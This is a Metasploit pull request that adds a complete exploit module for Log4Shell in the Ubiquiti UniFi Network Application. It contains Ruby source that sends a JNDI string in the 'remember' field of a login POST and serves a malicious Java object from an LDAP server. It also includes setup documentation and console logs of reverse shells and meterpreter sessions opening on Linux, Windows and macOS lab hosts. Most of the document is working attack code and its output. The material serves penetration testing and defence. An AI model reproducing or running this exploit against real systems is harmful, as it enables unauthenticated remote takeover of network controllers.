### PR TITLE
Log4Shell: Unifi Controller RCE

### DIFF
--- a/documentation/modules/exploit/multi/http/ubiquiti_unifi_log4shell.md
+++ b/documentation/modules/exploit/multi/http/ubiquiti_unifi_log4shell.md
@@ -2,8 +2,9 @@
 
 ### Description
 The Ubiquiti UniFi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
-vulnerability whereby a JNDI string can be sent to the server that will cause it to connect to the attacker and
-deserialize a malicious Java object. This results in OS command execution.
+vulnerability whereby a JNDI string can be sent to the server via the 'remember' field of a POST request to the
+/api/login endpoint that will cause the server to connect to the attacker and deserialize a malicious Java
+object. This results in OS command execution in the context of the server application.
 
 This module will start an LDAP server that the target will need to connect to.
 
@@ -32,7 +33,6 @@ Older versions of the UniFi Network Application can be downloaded from [communit
 ### UniFi Network Application v6.6.53 on Docker
 This uses jacobalberty/unifi:v6.5.53. Note that tags v6.5.54, v6.0.45, and v5.14.23 all contain the fix for this
 vulnerability. See [jacobalberty/unifi](https://hub.docker.com/r/jacobalberty/unifi) for more information.
-
 
 ```
 msf6 > use exploit/multi/http/ubiquiti_unifi_log4shell 

--- a/documentation/modules/exploit/multi/http/ubiquiti_unifi_log4shell.md
+++ b/documentation/modules/exploit/multi/http/ubiquiti_unifi_log4shell.md
@@ -1,7 +1,7 @@
 ## Vulnerable Application
 
 ### Description
-The Ubiquiti Unifi Controller application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
+The Ubiquiti UniFi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
 vulnerability whereby a JNDI string can be sent to the server that will cause it to connect to the attacker and
 deserialize a malicious Java object. This results in OS command execution.
 
@@ -10,7 +10,7 @@ This module will start an LDAP server that the target will need to connect to.
 ### Setup
 
 1. Either install the Windows application, or start the docker container (use jacobalberty/unifi:v6.5.53).
-2. Navigate to the service on HTTPS port 8443 to setup the Unifi controller.
+2. Navigate to the service on HTTPS port 8443 to setup the UniFi controller.
 3. On step 2, select the button to "Switch to Advanced Setup"
 4. While still on step 2, disable the remote access and "Use your Ubiquiti account for local access" options, then
    create a local account.
@@ -29,16 +29,16 @@ Older versions of the UniFi Network Application can be downloaded from [communit
 
 ## Scenarios
 
-### Unifi Controller on Docker
-This uses jacobalberty/unifi:v6.5.53. Note that tags v6.5.55, v6.0.45, and v5.14.23 all contain the fix for this
+### UniFi Network Application v6.6.53 on Docker
+This uses jacobalberty/unifi:v6.5.53. Note that tags v6.5.54, v6.0.45, and v5.14.23 all contain the fix for this
 vulnerability. See [jacobalberty/unifi](https://hub.docker.com/r/jacobalberty/unifi) for more information.
 
 
 ```
 msf6 > use exploit/multi/http/ubiquiti_unifi_log4shell 
 [*] Using configured payload windows/meterpreter/reverse_tcp
-msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set TARGET Linux
-TARGET => Linux
+msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set TARGET Unix
+TARGET => Unix
 msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set RHOST 192.168.250.6
 RHOST => 192.168.250.6
 msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set SRVHOST 192.168.250.134
@@ -64,7 +64,7 @@ pwd
 /usr/lib/unifi
 ```
 
-### Unifi Controler on Windows Server 2016
+### UniFi Network Application v6.5.53 on Windows Server 2016
 
 ```
 msf6 > use exploit/multi/http/ubiquiti_unifi_log4shell
@@ -102,6 +102,55 @@ Domain          : WORKGROUP
 Logged On Users : 2
 Meterpreter     : x86/windows
 meterpreter > 
+```
+
+### UniFi Network Application v5.14.22 on OSX 11.2.3
+
+```
+msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > show options
+
+Module options (exploit/multi/http/ubiquiti_unifi_log4shell):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   LDIF_FILE                   no        Directory LDIF file path
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     111.111.1.11     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      8443             yes       The target port (TCP)
+   SRVHOST    222.222.2.222    yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    389              yes       The local port to listen on.
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       Base path
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_zsh):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  222.222.2.222    yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   2   Unix
+
+
+msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > run
+
+[*] Started reverse TCP handler on 222.222.2.222:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[+] Delivering the serialized Java object to execute the payload...
+[*] Client sent unexpected request 2
+[*] Command shell session 2 opened (222.222.2.222:4444 -> 111.111.1.11:50474 ) at 2022-01-20 07:20:22 -0500
+[*] Server stopped.
+
+id
+uid=501(yourmom) gid=20(staff) groups=20(staff),501(access_bpf),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),399(com.apple.access_ssh),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),400(com.apple.access_remote_ae)
 ```
 
 [1]: https://community.ui.com/releases?q=network+application

--- a/documentation/modules/exploit/multi/http/ubiquiti_unifi_log4shell.md
+++ b/documentation/modules/exploit/multi/http/ubiquiti_unifi_log4shell.md
@@ -1,22 +1,23 @@
 ## Vulnerable Application
 
 ### Description
-The Unbiquiti Unifi Controller application is affected by the Log4Shell vulnerability whereby a JNDI string can
-be sent to the server that will cause it to connect to the attacker and deserialize a malicious Java object.
-This results in OS command execution.
+The Ubiquiti Unifi Controller application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
+vulnerability whereby a JNDI string can be sent to the server that will cause it to connect to the attacker and
+deserialize a malicious Java object. This results in OS command execution.
 
 This module will start an LDAP server that the target will need to connect to.
 
 ### Setup
 
 1. Either install the Windows application, or start the docker container (use jacobalberty/unifi:v6.5.53).
-1. Navigate to the service on HTTPS port 8443 to setup the Unifi controller.
-1. On step 2, select the button to "Switch to Advanced Setup"
-1. While still on step 2, disable the remote access and "Use your Ubiquiti account for local access" options, then
+2. Navigate to the service on HTTPS port 8443 to setup the Unifi controller.
+3. On step 2, select the button to "Switch to Advanced Setup"
+4. While still on step 2, disable the remote access and "Use your Ubiquiti account for local access" options, then
    create a local account.
-1. On step 5, when prompted to setup WiFi, select the "Skip" button in the bottom right corner.
-1. Review the configuration, and finalize it.
+5. On step 5, when prompted to setup WiFi, select the "Skip" button in the bottom right corner.
+6. Review the configuration, and finalize it.
 
+Older versions of the UniFi Network Application can be downloaded from [community.ui.com][1].
 
 ## Verification Steps
 
@@ -102,3 +103,5 @@ Logged On Users : 2
 Meterpreter     : x86/windows
 meterpreter > 
 ```
+
+[1]: https://community.ui.com/releases?q=network+application

--- a/documentation/modules/exploit/multi/http/ubiquiti_unifi_log4shell.md
+++ b/documentation/modules/exploit/multi/http/ubiquiti_unifi_log4shell.md
@@ -1,0 +1,104 @@
+## Vulnerable Application
+
+### Description
+The Unbiquiti Unifi Controller application is affected by the Log4Shell vulnerability whereby a JNDI string can
+be sent to the server that will cause it to connect to the attacker and deserialize a malicious Java object.
+This results in OS command execution.
+
+This module will start an LDAP server that the target will need to connect to.
+
+### Setup
+
+1. Either install the Windows application, or start the docker container (use jacobalberty/unifi:v6.5.53).
+1. Navigate to the service on HTTPS port 8443 to setup the Unifi controller.
+1. On step 2, select the button to "Switch to Advanced Setup"
+1. While still on step 2, disable the remote access and "Use your Ubiquiti account for local access" options, then
+   create a local account.
+1. On step 5, when prompted to setup WiFi, select the "Skip" button in the bottom right corner.
+1. Review the configuration, and finalize it.
+
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use exploit/multi/http/ubiquiti_unifi_log4shell`
+3. Set the `RHOSTS`, `TARGET`, `PAYLOAD`, and payload associated options
+4. Do: `run`
+5. If the target is vulnerable, the payload should be executed
+
+## Scenarios
+
+### Unifi Controller on Docker
+This uses jacobalberty/unifi:v6.5.53. Note that tags v6.5.55, v6.0.45, and v5.14.23 all contain the fix for this
+vulnerability. See [jacobalberty/unifi](https://hub.docker.com/r/jacobalberty/unifi) for more information.
+
+
+```
+msf6 > use exploit/multi/http/ubiquiti_unifi_log4shell 
+[*] Using configured payload windows/meterpreter/reverse_tcp
+msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set TARGET Linux
+TARGET => Linux
+msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set RHOST 192.168.250.6
+RHOST => 192.168.250.6
+msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set SRVHOST 192.168.250.134
+SRVHOST => 192.168.250.134
+msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set LHOST 192.168.250.134
+LHOST => 192.168.250.134
+msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set PAYLOAD cmd/unix/reverse_bash
+PAYLOAD => cmd/unix/reverse_bash
+msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set RPORT 8443
+RPORT => 8443
+msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > exploit
+
+[*] Started reverse TCP handler on 192.168.250.134:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[+] Delivering the serialized Java object to execute the payload...
+[*] Command shell session 5 opened (192.168.250.134:4444 -> 192.168.250.6:44984 ) at 2022-01-14 09:21:04 -0500
+[*] Server stopped.
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+pwd
+/usr/lib/unifi
+```
+
+### Unifi Controler on Windows Server 2016
+
+```
+msf6 > use exploit/multi/http/ubiquiti_unifi_log4shell
+[*] Using configured payload windows/meterpreter/reverse_tcp
+msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set TARGET Windows
+TARGET => Windows
+msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set RHOST 192.168.159.65
+RHOST => 192.168.159.65
+msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set SRVHOST 192.168.159.128
+SRVHOST => 192.168.159.128
+msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set LHOST 192.168.159.128
+LHOST => 192.168.159.128
+msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set RPORT 8443
+RPORT => 8443
+msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set PAYLOAD windows/meterpreter/reverse_tcp
+PAYLOAD => windows/meterpreter/reverse_tcp
+msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[+] Delivering the serialized Java object to execute the payload...
+[*] Sending stage (175174 bytes) to 192.168.159.65
+[*] Meterpreter session 4 opened (192.168.159.128:4444 -> 192.168.159.65:51940 ) at 2022-01-14 09:19:25 -0500
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: WIN-BPID95ACQ7E\smcintyre
+meterpreter > sysinfo
+Computer        : WIN-BPID95ACQ7E
+OS              : Windows 2016+ (10.0 Build 14393).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter > 
+```

--- a/modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb
+++ b/modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb
@@ -14,8 +14,9 @@ class MetasploitModule < Msf::Exploit::Remote
       'Name' => 'UniFi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell)',
       'Description' => %q{
         The Ubiquiti UniFi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
-        vulnerability whereby a JNDI string can be sent to the server that will cause it to connect to the attacker and
-        deserialize a malicious Java object. This results in OS command execution.
+        vulnerability whereby a JNDI string can be sent to the server via the 'remember' field of a POST request to the
+        /api/login endpoint that will cause the server to connect to the attacker and deserialize a malicious Java
+        object. This results in OS command execution in the context of the server application.
 
         This module will start an LDAP server that the target will need to connect to.
       },
@@ -77,10 +78,10 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     validate_configuration!
     res = send_request_cgi('uri' => normalize_uri(target_uri, 'status'))
-    return Exploit::CheckCode::Unknown if res.nil?
+    return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil?
 
     server_version = res.get_json_document.dig('meta', 'server_version')
-    return Exploit::CheckCode::Safe unless server_version =~ /(\d+\.)+/
+    return Exploit::CheckCode::Safe('The target service does not appear to be running.') unless server_version =~ /(\d+\.)+/
 
     vprint_status("Detected version: #{server_version}")
     server_version = Rex::Version.new(server_version)
@@ -93,12 +94,11 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status('The target appears to be a vulnerable version, attempting to trigger the vulnerability...')
 
     start_service
-    trigger
+    res = trigger
+    return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil?
 
     wait_until { @search_received }
-    return Exploit::CheckCode::Unknown unless @search_received
-
-    Exploit::CheckCode::Vulnerable
+    @search_received ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Unknown('No LDAP search query was received.')
   ensure
     stop_service
   end
@@ -122,7 +122,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'POST',
       'ctype' => 'application/json',
       'data' => {
-        'username' => jndi_string,
+        'username' => rand_text_alphanumeric(8..16), # can not be blank!,
         'password' => rand_text_alphanumeric(8..16), # can not be blank!
         'remember' => jndi_string,
         'strict' => true

--- a/modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb
+++ b/modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb
@@ -11,9 +11,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(_info = {})
     super(
-      'Name' => 'Unifi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell)',
+      'Name' => 'UniFi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell)',
       'Description' => %q{
-        The Ubiquiti Unifi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
+        The Ubiquiti UniFi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
         vulnerability whereby a JNDI string can be sent to the server that will cause it to connect to the attacker and
         deserialize a malicious Java object. This results in OS command execution.
 
@@ -37,6 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'SSL' => true,
         'WfsDelay' => 30
       },
+      'DefaultTarget' => 1,
       'Targets' => [
         [
           'Windows', {
@@ -44,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
           },
         ],
         [
-          'Linux', {
+          'Unix', {
             'Platform' => 'unix',
             'Arch' => [ARCH_CMD],
             'DefaultOptions' => {
@@ -85,8 +86,8 @@ class MetasploitModule < Msf::Exploit::Remote
     server_version = Rex::Version.new(server_version)
     if server_version < Rex::Version.new('5.13.29')
       return Exploit::CheckCode::Safe('Versions prior to 5.13.29 are not exploitable.')
-    elsif server_version > Rex::Version.new('6.5.54')
-      return Exploit::CheckCode::Safe('Versions after 6.5.54 are patched and not affected.')
+    elsif server_version > Rex::Version.new('6.5.53')
+      return Exploit::CheckCode::Safe('Versions after 6.5.53 are patched and not affected.')
     end
 
     vprint_status('The target appears to be a vulnerable version, attempting to trigger the vulnerability...')

--- a/modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb
+++ b/modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb
@@ -1,0 +1,128 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::JndiInjection
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(_info = {})
+    super(
+      'Name' => 'Unifi Controller Unauthenticated JNDI Injection RCE (via Log4Shell)',
+      'Description' => %q{
+        The Unbiquiti Unifi Controller application is affected by the Log4Shell vulnerability whereby a JNDI string can
+        be sent to the server that will cause it to connect to the attacker and deserialize a malicious Java object.
+        This results in OS command execution.
+
+        This module will start an LDAP server that the target will need to connect to.
+      },
+      'Author' => [
+        'Spencer McIntyre', # this exploit module and JNDI/LDAP lib stuff
+        'RageLtMan <rageltman[at]sempervictus>', # JNDI/LDAP lib stuff
+        'Nicholas Anastasi' # Unifi research
+      ],
+      'References' => [
+        [ 'CVE', '2021-44228' ],
+        [ 'URL', 'https://www.sprocketsecurity.com/blog/another-log4j-on-the-fire-unifi' ],
+        [ 'URL', 'https://github.com/puzzlepeaches/Log4jUnifi' ]
+      ],
+      'DisclosureDate' => '2021-12-09',
+      'License' => MSF_LICENSE,
+      'DefaultOptions' => {
+        'RPORT' => 8443,
+        'SSL' => true,
+        'WfsDelay' => 30
+      },
+      'Targets' => [
+        [
+          'Windows', {
+            'Platform' => 'win'
+          },
+        ],
+        [
+          'Linux', {
+            'Platform' => 'unix',
+            'Arch' => [ARCH_CMD],
+            'DefaultOptions' => {
+              'PAYLOAD' => 'cmd/unix/reverse_bash'
+            }
+          },
+        ]
+      ],
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'SideEffects' => [IOC_IN_LOGS],
+        'AKA' => ['Log4Shell', 'LogJam'],
+        'Reliability' => [REPEATABLE_SESSION]
+      }
+    )
+    register_options([
+      OptString.new('TARGETURI', [ true, 'Base path', '/'])
+    ])
+  end
+
+  def wait_until(&block)
+    datastore['WfsDelay'].times do
+      break if block.call
+
+      sleep(1)
+    end
+  end
+
+  def check
+    validate_configuration!
+
+    start_service
+    trigger
+
+    wait_until { @search_received }
+    return Exploit::CheckCode::Unknown unless @search_received
+
+    Exploit::CheckCode::Vulnerable
+  ensure
+    stop_service
+  end
+
+  def build_ldap_search_response_payload
+    return [] if @search_received
+
+    @search_received = true
+
+    return [] unless @exploiting
+
+    print_good('Delivering the serialized Java object to execute the payload...')
+    build_ldap_search_response_payload_inline('BeanFactory')
+  end
+
+  def trigger
+    @search_received = false
+    # HTTP request initiator
+    send_request_raw(
+      'uri' => normalize_uri(target_uri, 'api', 'login'),
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'data' => {
+        'username' => jndi_string,
+        'password' => rand_text_alphanumeric(8..16), # can not be blank!
+        'remember' => jndi_string,
+        'strict' => true
+      }.to_json
+    )
+  end
+
+  def exploit
+    validate_configuration!
+
+    @exploiting = true
+    start_service
+    trigger
+
+    wait_until { @search_received && (!handler_enabled? || session_created?) }
+    handler
+  ensure
+    cleanup
+  end
+end

--- a/modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb
+++ b/modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb
@@ -100,7 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def trigger
     @search_received = false
     # HTTP request initiator
-    send_request_raw(
+    send_request_cgi(
       'uri' => normalize_uri(target_uri, 'api', 'login'),
       'method' => 'POST',
       'ctype' => 'application/json',
@@ -118,7 +118,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
     @exploiting = true
     start_service
-    trigger
+    res = trigger
+    fail_with(Failure::Unreachable, 'Failed to trigger the vulnerability') if res.nil?
+
+    unless res.code == 400 && res.get_json_document.dig('meta', 'msg') == 'api.err.InvalidPayload'
+      fail_with(Failure::UnexpectedReply, 'The server replied to the trigger in an unexpected way')
+    end
 
     wait_until { @search_received && (!handler_enabled? || session_created?) }
     handler

--- a/modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb
+++ b/modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb
@@ -11,11 +11,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(_info = {})
     super(
-      'Name' => 'Unifi Controller Unauthenticated JNDI Injection RCE (via Log4Shell)',
+      'Name' => 'Unifi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell)',
       'Description' => %q{
-        The Unbiquiti Unifi Controller application is affected by the Log4Shell vulnerability whereby a JNDI string can
-        be sent to the server that will cause it to connect to the attacker and deserialize a malicious Java object.
-        This results in OS command execution.
+        The Ubiquiti Unifi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
+        vulnerability whereby a JNDI string can be sent to the server that will cause it to connect to the attacker and
+        deserialize a malicious Java object. This results in OS command execution.
 
         This module will start an LDAP server that the target will need to connect to.
       },
@@ -27,7 +27,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'References' => [
         [ 'CVE', '2021-44228' ],
         [ 'URL', 'https://www.sprocketsecurity.com/blog/another-log4j-on-the-fire-unifi' ],
-        [ 'URL', 'https://github.com/puzzlepeaches/Log4jUnifi' ]
+        [ 'URL', 'https://github.com/puzzlepeaches/Log4jUnifi' ],
+        [ 'URL', 'https://community.ui.com/releases/UniFi-Network-Application-6-5-54/d717f241-48bb-4979-8b10-99db36ddabe1' ]
       ],
       'DisclosureDate' => '2021-12-09',
       'License' => MSF_LICENSE,
@@ -74,6 +75,21 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     validate_configuration!
+    res = send_request_cgi('uri' => normalize_uri(target_uri, 'status'))
+    return Exploit::CheckCode::Unknown if res.nil?
+
+    server_version = res.get_json_document.dig('meta', 'server_version')
+    return Exploit::CheckCode::Safe unless server_version =~ /(\d+\.)+/
+
+    vprint_status("Detected version: #{server_version}")
+    server_version = Rex::Version.new(server_version)
+    if server_version < Rex::Version.new('5.13.29')
+      return Exploit::CheckCode::Safe('Versions prior to 5.13.29 are not exploitable.')
+    elsif server_version > Rex::Version.new('6.5.54')
+      return Exploit::CheckCode::Safe('Versions after 6.5.54 are patched and not affected.')
+    end
+
+    vprint_status('The target appears to be a vulnerable version, attempting to trigger the vulnerability...')
 
     start_service
     trigger
@@ -121,7 +137,12 @@ class MetasploitModule < Msf::Exploit::Remote
     res = trigger
     fail_with(Failure::Unreachable, 'Failed to trigger the vulnerability') if res.nil?
 
-    unless res.code == 400 && res.get_json_document.dig('meta', 'msg') == 'api.err.InvalidPayload'
+    msg = res.get_json_document.dig('meta', 'msg')
+    if res.code == 400 && msg == 'api.err.Invalid' # returned by versions before 5.13.29
+      fail_with(Failure::NotVulnerable, 'The target is not vulnerable')
+    end
+
+    unless res.code == 400 && msg == 'api.err.InvalidPayload' # returned by versions after 5.13.29 (including patched ones)
       fail_with(Failure::UnexpectedReply, 'The server replied to the trigger in an unexpected way')
     end
 


### PR DESCRIPTION
~~**Requires the changes from #16050 to be introduced first** for the BeanFactory gadget chain as well as the JndiInjection mixin, unit tests are expected to fail until then because the module won't load.~~

This is an unauthenticated RCE in the Ubiquiti Unifi controller application, leveraging the Log4shell vulnerability. It has been tested on both the Linux docker container (v6.0.45 and 6.5.53) as well as the Windows application (v6.5.53). The injection point is within JSON data that is sent via a POST request to the `api/login` endpoint. Because the injection point is not within a header, the existing scanner module is incapable of detecting this particular instance so a basic check method that triggers the vulnerability is included within the module.

## Verification Steps
Steps for configuring Unifi are outlined within the module docs. Setup steps once the application is installed are the same for Windows as they are for the Docker container.

- [ ] Start msfconsole
- [ ]  Do: `use exploit/multi/http/ubiquiti_unifi_log4shell `
- [ ]  Set the `RHOSTS`, `TARGET`, `PAYLOAD`, and payload associated options
- [ ]  Do: `run`
- [ ] A session should be opened

## Example (Linux Docker Container)

```
msf6 > use exploit/multi/http/ubiquiti_unifi_log4shell 
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set TARGET Linux
TARGET => Linux
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set RHOST 192.168.250.6
RHOST => 192.168.250.6
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set SRVHOST 192.168.250.134
SRVHOST => 192.168.250.134
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set LHOST 192.168.250.134
LHOST => 192.168.250.134
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set PAYLOAD cmd/unix/reverse_bash
PAYLOAD => cmd/unix/reverse_bash
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set RPORT 8443
RPORT => 8443
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > exploit

[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Delivering the serialized Java object to execute the payload...
[*] Command shell session 5 opened (192.168.250.134:4444 -> 192.168.250.6:44984 ) at 2022-01-14 09:21:04 -0500
[*] Server stopped.

id
uid=0(root) gid=0(root) groups=0(root)
pwd
/usr/lib/unifi
```